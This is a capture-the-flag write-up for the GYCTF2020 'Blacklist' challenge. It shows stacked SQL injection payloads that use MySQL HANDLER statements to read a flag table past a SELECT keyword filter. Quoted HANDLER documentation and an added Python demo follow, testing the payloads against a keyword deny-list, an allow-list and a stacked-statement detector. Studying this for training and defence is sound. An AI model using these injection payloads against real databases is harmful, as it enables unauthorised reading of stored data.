[GYCTF2020]Blacklist


payload:1'

payload:1';show databases;


payload:1';show tables;


payload: 1';select * from FlagHere;


Many sensitive keywords are filtered here.

payload: 1';

HANDLER FlagHere OPEN;

HANDLER FlagHere READ FIRST;

HANDLER FlagHere CLOSE;


 

HANDLER Statement

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

The HANDLER statement provides direct access to the table storage engine interface. It can be used for tables

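The HANDLER ... OPEN statement opens a table, making it accessible using subsequent HANDLER ... READ statements. This table object is not shared by other sessions and is not closed until the session calls HANDLER ... CLOSE or the session terminates.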

HANDLER tbl_name CLOSE

Example:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| users          |
| word1          |
+----------------+
2 rows in set (0.00 sec)

mysql> HANDLER users OPEN;
Query OK, 0 rows affected (0.39 sec)

mysql> HANDLER users READ FIRST;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Bob      | 123456   |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> HANDLER users CLOSE;
Query OK, 0 rows affected (0.00 sec)
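Why the keyword filter above fails, and what to use instead, as an added example (not code from the write-up or from the challenge). It runs the write-up's payloads through a deny-list, an allow-list, and a stacked-statement check on the assembled query. Assumptions: the deny-list is constructed, the query template and table name `items` are hypothetical, and the parameter is taken to be a numeric id.

```python
import re

# Constructed deny-list modelled only on what the write-up observes: "select"
# is rejected while "show" and "handler" pass. Not the challenge's real filter.
DENYLIST = re.compile(r"select|update|delete|insert|drop|union", re.I)

# Payloads quoted in the write-up (the HANDLER one joined onto a single line).
PAYLOADS = [
    "1'",
    "1';show databases;",
    "1';show tables;",
    "1';select * from FlagHere;",
    "1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;",
]

def denylist_accepts(value):
    """Keyword deny-list: accepts any input that avoids the listed words."""
    return DENYLIST.search(value) is None

def allowlist_accepts(value):
    """Allow-list: the parameter is assumed to be a short numeric id."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None

def assemble(value):
    """Hypothetical vulnerable template: input concatenated inside quotes."""
    return "select * from items where id = '" + value + "';"

def statement_verbs(sql):
    """Split on ';' outside single-quoted strings and return the leading
    keyword of each statement (backslash escapes are ignored for brevity)."""
    statements, current, in_quote = [], [], False
    for ch in sql:
        if ch == "'":
            in_quote = not in_quote
        if ch == ";" and not in_quote:
            statements.append("".join(current))
            current = []
        else:
            current.append(ch)
    statements.append("".join(current))
    found = (re.match(r"\s*([A-Za-z_]+)", s) for s in statements)
    return [m.group(1).upper() for m in found if m]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(denylist_accepts(p), allowlist_accepts(p), statement_verbs(assemble(p)))
```

The allow-list belongs in front of a parameterized, single-statement query call. More than one leading verb in a query that should contain a single SELECT is the signal to alert on in query logs.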
